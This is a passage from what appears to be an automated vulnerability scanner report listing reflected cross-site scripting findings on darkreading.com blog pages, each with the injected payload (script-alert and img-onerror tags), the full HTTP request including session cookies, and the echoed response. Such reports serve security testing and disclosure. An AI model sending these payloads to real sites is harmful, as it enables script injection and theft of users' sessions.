This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700845/ways-to-slow-an-attacker.html4af48"><a>1d76de72611 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Ways To S ...[SNIP]... reading.com%2Fblog%2F227700845%2Fways-to-slow-an-attacker.html4af48%22%3E%3Ca%3E1d76de72611&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.html4af48"><a>1d76de72611"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d4eea'><img%20src%3da%20onerror%3dalert(1)>42541a51d04 was submitted in the REST URL parameter 3. This input was echoed as d4eea'><img src=a onerror=alert(1)>42541a51d04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700845/ways-to-slow-an-attacker.htmld4eea'><img%20src%3da%20onerror%3dalert(1)>42541a51d04 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Ways To S ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.htmld4eea'><img src=a onerror=alert(1)>42541a51d04'> ...[SNIP]...
3.275. http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/227700845/ways-to-slow-an-attacker.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48bf1"><script>alert(1)</script>d086710f064 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700845/ways-to-slow-an-attacker.html?48bf1"><script>alert(1)</script>d086710f064=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Ways To S ...[SNIP]... -slow-an-attacker.html%3F48bf1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed086710f064%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.html?48bf1"><script>alert(1)</script>d086710f064=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c969"><a>8d271a4371e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/2277008463c969"><a>8d271a4371e/data-visualization-for-faster-more-effective-pen-testing.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fabf2'><img%20src%3da%20onerror%3dalert(1)>de3cbedd4c1 was submitted in the REST URL parameter 3. This input was echoed as fabf2'><img src=a onerror=alert(1)>de3cbedd4c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700846/data-visualization-for-faster-more-effective-pen-testing.htmlfabf2'><img%20src%3da%20onerror%3dalert(1)>de3cbedd4c1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66775"><a>f7f71040802 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html66775"><a>f7f71040802 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Data Visu ...[SNIP]... ore-effective-pen-testing.html66775%22%3E%3Ca%3Ef7f71040802&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html66775"><a>f7f71040802"> ...[SNIP]...
3.279. http://www.darkreading.com/blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9bae"><script>alert(1)</script>9483c08e66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html?e9bae"><script>alert(1)</script>9483c08e66=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3838"><a>a2dec1ba028 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700848c3838"><a>a2dec1ba028/vxworks-vulnerability-tools-released.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 36605'><img%20src%3da%20onerror%3dalert(1)>373034fd0d3 was submitted in the REST URL parameter 3. This input was echoed as 36605'><img src=a onerror=alert(1)>373034fd0d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700848/vxworks-vulnerability-tools-released.html36605'><img%20src%3da%20onerror%3dalert(1)>373034fd0d3 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fce7"><a>f47bc946708 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700848/vxworks-vulnerability-tools-released.html7fce7"><a>f47bc946708 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>VxWorks V ...[SNIP]... 700848%2Fvxworks-vulnerability-tools-released.html7fce7%22%3E%3Ca%3Ef47bc946708&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700848/vxworks-vulnerability-tools-released.html7fce7"><a>f47bc946708"> ...[SNIP]...
3.283. http://www.darkreading.com/blog/227700848/vxworks-vulnerability-tools-released.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc061"><script>alert(1)</script>d0cdd18f506 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700848/vxworks-vulnerability-tools-released.html?bc061"><script>alert(1)</script>d0cdd18f506=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159cc"><a>b9604656feb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700867159cc"><a>b9604656feb/gaining-a-foothold-by-exploiting-vxworks-vulns.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84127'><img%20src%3da%20onerror%3dalert(1)>dfd27ef97ee was submitted in the REST URL parameter 3. This input was echoed as 84127'><img src=a onerror=alert(1)>dfd27ef97ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html84127'><img%20src%3da%20onerror%3dalert(1)>dfd27ef97ee HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dea3"><a>6c8dd42b64a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html3dea3"><a>6c8dd42b64a HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Gaining A ...[SNIP]... oothold-by-exploiting-vxworks-vulns.html3dea3%22%3E%3Ca%3E6c8dd42b64a&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html3dea3"><a>6c8dd42b64a"> ...[SNIP]...
3.287. http://www.darkreading.com/blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76fc7"><script>alert(1)</script>d46adcfb329 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html?76fc7"><script>alert(1)</script>d46adcfb329=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f050e"><a>4c815c9ece2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700876f050e"><a>4c815c9ece2/web-based-spam-detection-with-google-alerts.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3f02a'><img%20src%3da%20onerror%3dalert(1)>923088657cd was submitted in the REST URL parameter 3. This input was echoed as 3f02a'><img src=a onerror=alert(1)>923088657cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700876/web-based-spam-detection-with-google-alerts.html3f02a'><img%20src%3da%20onerror%3dalert(1)>923088657cd HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0919"><a>e75d1ee21cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700876/web-based-spam-detection-with-google-alerts.htmld0919"><a>e75d1ee21cf HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Web-Based ...[SNIP]... ased-spam-detection-with-google-alerts.htmld0919%22%3E%3Ca%3Ee75d1ee21cf&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700876/web-based-spam-detection-with-google-alerts.htmld0919"><a>e75d1ee21cf"> ...[SNIP]...
3.291. http://www.darkreading.com/blog/227700876/web-based-spam-detection-with-google-alerts.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c61b9"><script>alert(1)</script>6702015b9f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700876/web-based-spam-detection-with-google-alerts.html?c61b9"><script>alert(1)</script>6702015b9f2=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Web-Based ...[SNIP]... tml%3Fc61b9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6702015b9f2%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700876/web-based-spam-detection-with-google-alerts.html?c61b9"><script>alert(1)</script>6702015b9f2=1"> ...[SNIP]...
3.292. http://www.darkreading.com/blog/227700916/facebook-s-security-team-frustrates-cybercriminals.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1c7f"><script>alert(1)</script>9ac83abdbf0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700916/facebook-s-security-team-frustrates-cybercriminals.html?a1c7f"><script>alert(1)</script>9ac83abdbf0=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 674f1"><a>0b80a9d80b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700968674f1"><a>0b80a9d80b3/lock-picking-popularity-grows.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d726'><img%20src%3da%20onerror%3dalert(1)>410a19879b1 was submitted in the REST URL parameter 3. This input was echoed as 5d726'><img src=a onerror=alert(1)>410a19879b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700968/lock-picking-popularity-grows.html5d726'><img%20src%3da%20onerror%3dalert(1)>410a19879b1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d9c"><a>f9ca83916dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700968/lock-picking-popularity-grows.html72d9c"><a>f9ca83916dc HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c026"><script>alert(1)</script>b37f20d1469 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700968/lock-picking-popularity-grows.html?8c026"><script>alert(1)</script>b37f20d1469=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 837a8"><a>6f7c4dee08e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700969837a8"><a>6f7c4dee08e/defcon-bridging-the-gap-between-hardware-and-software-hacking.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f2753'><img%20src%3da%20onerror%3dalert(1)>bac8c31d381 was submitted in the REST URL parameter 3. This input was echoed as f2753'><img src=a onerror=alert(1)>bac8c31d381 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.htmlf2753'><img%20src%3da%20onerror%3dalert(1)>bac8c31d381 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db7ee"><a>40b12ebfcce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.htmldb7ee"><a>40b12ebfcce HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>DEFCON: B ...[SNIP]... and-software-hacking.htmldb7ee%22%3E%3Ca%3E40b12ebfcce&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.htmldb7ee"><a>40b12ebfcce"> ...[SNIP]...
3.300. http://www.darkreading.com/blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 439cb"><script>alert(1)</script>e68d433efa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.html?439cb"><script>alert(1)</script>e68d433efa3=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1a71"><a>7e18c0860cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
